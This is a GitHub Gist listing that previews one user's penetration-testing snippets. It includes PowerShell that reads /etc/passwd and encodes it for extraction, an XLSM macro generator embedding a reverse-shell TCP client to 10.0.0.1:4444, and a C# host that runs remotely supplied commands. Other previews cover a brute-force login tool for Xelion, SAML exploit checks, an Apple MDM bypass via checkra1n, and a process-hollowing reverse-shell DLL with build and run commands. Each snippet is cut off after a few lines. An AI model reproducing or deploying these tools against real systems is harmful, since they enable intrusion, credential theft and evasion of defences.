Frank Spierings FrankSpierings

@FrankSpierings
FrankSpierings / sql-query-ps-oneliner.ps1
Last active Jul 14, 2021
PowerShell Oneliner to perform database queries.
powershell "$sql='SELECT @@VERSION';$c=(New-Object -TypeName System.Data.SqlClient.SqlConnection('server=SERVER;Database=DATABASE;Integrated Security=True;'));$c.open();$q=(New-Object System.Data.SqlClient.SqlCommand($sql,$c));$r=$q.ExecuteReader();$oo=@();while ($r.Read()){$o=(New-Object PSObject);for ($i=0;$i -lt $r.FieldCount;$i++){$n=$r.GetName($i);if($n -eq ''){$n='column_'+$i};$o|Add-Member -type NoteProperty -Name $n -Value $r[$i];}$oo+=$o};$oo|FT -Wrap"
@FrankSpierings
FrankSpierings / read-file-aesencrypt-base54.ps1
$filepath = "/etc/passwd"
$fs = New-Object IO.FileStream($filepath, [System.IO.FileMode]::Open);
$ms = New-Object System.IO.MemoryStream;
$aes = [System.Security.Cryptography.Aes]::Create();
$aes.keysize = 128;
Write-Host "Key: " (($aes.Key |% ToString X2) -join '');
Write-Host "IV: " (($aes.IV |% ToString X2) -join '');
Write-Host "Mode: " $aes.mode
$cs = New-Object System.Security.Cryptography.CryptoStream($ms, $aes.CreateEncryptor(), [System.Security.Cryptography.CryptoStreamMode]::Write);
$fs.CopyTo($cs);
@FrankSpierings
FrankSpierings / read-file-gzip-base64.ps1
Last active Jul 8, 2021
Read file, gzip and convert to base64.
$filepath = "/etc/passwd"
$fs = New-Object IO.FileStream($filepath, [System.IO.FileMode]::Open)
$ms = New-Object System.IO.MemoryStream;
$gzs = New-Object System.IO.Compression.GzipStream($ms, [System.IO.Compression.CompressionMode]::Compress);
$fs.CopyTo($gzs);
$fs.Close();
$gzs.Close();
$ms.Close();
[System.Convert]::ToBase64String($ms.ToArray());
@FrankSpierings
FrankSpierings / generate-xlsm-macro.py
Created Apr 30, 2021
Generate an XLSM macro from Python
import codecs
import base64
data = '''$lhost="10.0.0.1";
$lport=4444;
$MAXCMDLENGTH=65535;
$client = New-Object System.Net.Sockets.TCPClient($lhost, $lport);
$stream = $client.GetStream();
@FrankSpierings
FrankSpierings / pshost.cs
Created Apr 29, 2021
PowerShell Host example. Obtaining its commands from a remote location.
// c:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe pshost.cs /r:c:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll
using System;
using System.Management.Automation;
using System.Management.Automation.Runspaces;
using PowerShell = System.Management.Automation.PowerShell;
internal class InfantAnnihilator
{
private static void Main(string[] args)
{
@FrankSpierings
FrankSpierings / ms-rsa-blob-to.py
Last active Apr 25, 2021
Decrypt Protect file using PVK Domain key
# Referenced sources:
# - Mimikatz
# - https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-wcce/5cf2e6b9-3195-4f85-bc18-05b50e6d4e11
# - https://docs.microsoft.com/en-us/windows/win32/api/wincrypt/ns-wincrypt-publickeystruc
from io import BytesIO
import struct
import math
import codecs
from Crypto.PublicKey import RSA
@FrankSpierings
FrankSpierings / Brutus.java
Created Mar 16, 2021
Brutus - Brute-force login on a Xelion system using their own classes.
/*
- Get the .jar files from the server (check .jnlp file).
- Extract those .jar files (unzip).
- Place Brutus.java in the same directory.
- Compile using the JDK: "c:\Program Files\Java\jdk-16\bin\javac.exe" -target 1.7 -source 1.7 Brutus.java
- Notice the target & source. Otherwise CORBA can't be found.
- Run: java Brutus <accountname> <ascii password file> <target>
- Example: java Brutus beheerder passwords.txt xelion.local
*/
@FrankSpierings
FrankSpierings / samlraider.py
Created Feb 25, 2021
SAMLRaider in Python, useful to automate (new) logins and the automatic exploit checks.
import xml.dom.minidom as minidom
# Constants
COLLABORATOR = 'example.burpcollaborator.net'
class SAMLRaider():
def __init__(self, match_replace_map: dict = None):
"""SAMLRainder object
@FrankSpierings
FrankSpierings / README.MD
Last active May 31, 2021
Apple Device Enrollment Program (DEP) - Bypass MDM Policy using Checkra1n exploit

Pre-requirements

  • Install a socket daemon to multiplex connections from and to iOS devices, run: brew install usbmuxd
  • Start the socket daemon iproxy 2222 44
  • Install checkra1n exploit locally, run: brew install checkra1n
  • When SSH password authentication is requested, use: alpine.

Wipe iPad and restore Firmware

@FrankSpierings
FrankSpierings / process-hollow-shell-dll.c
Last active Jul 25, 2021
Reverse shell which uses process hollowing technique
// docker run -it --rm -v `pwd`:/tmp/building ubuntu bash -c "cd /tmp/building; apt update && apt install -y mingw-w64 upx && i686-w64-mingw32-gcc -O3 -s process-hollow-shell-dll.c -lws2_32 -lntdll -shared -o process-hollow-shell.dll; upx --ultra-brute process-hollow-shell.dll"
//
// Use -DDEBUG at compile time, for the logging printf messages.
// Use -DNON_MS_DLL_BLOCK at compile time, to block injection of non-Microsoft DLLs into the host process.
// Use -DWAITFOR at compile time, to wait for the host process to finish.
//
// Run:
// rundll32 process-hollow-shell.dll,main 127.0.0.1 4444
// rundll32 process-hollow-shell.dll,main 127.0.0.1 4444 c:\windows\system32\cmd.exe
// rundll32 process-hollow-shell.dll,main 127.0.0.1 4444 c:\windows\system32\cmd.exe c:\windows\system32\notepad.exe